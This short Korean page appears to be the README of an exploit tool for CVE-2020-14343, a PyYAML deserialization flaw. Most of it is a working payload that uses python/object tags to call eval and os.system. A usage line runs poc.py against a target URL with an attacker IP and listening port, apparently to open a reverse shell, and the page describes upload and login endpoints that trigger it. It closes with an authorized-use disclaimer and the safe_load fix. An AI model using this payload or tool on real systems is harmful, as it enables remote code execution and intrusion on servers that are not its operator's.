
CVE-2020-14343의 페이로드
| 항목 | 정보 |
|---|---|
| CVE 번호 | CVE-2020-14343 |
| 영향 컴포넌트 | PyYAML < 5.4 |
| 취약점 유형 | 역직렬화 원격 코드 실행 (RCE) |
| 위험 등급 | 높음 |
PyYAML은 yaml.load()로 신뢰할 수 없는 데이터를 파싱할 때 위험한 YAML 태그(예: !!python/object)를 제한하지 않으며, 공격자는 악성 YAML 콘텐츠를 구성하여 임의의 Python 코드를 실행할 수 있습니다.
Payload 핵심:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <目标URL> <攻击者IP> <监听端口>
예시:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload 엔드포인트에 업로드합니다/login 엔드포인트를 트리거하여 YAML을 로드하고 파싱합니다pip install requests
⚠️ 이 도구는 보안 연구 및 승인된 테스트 용도로만 사용하세요!
yaml.load() 대신 yaml.safe_load()를 사용하세요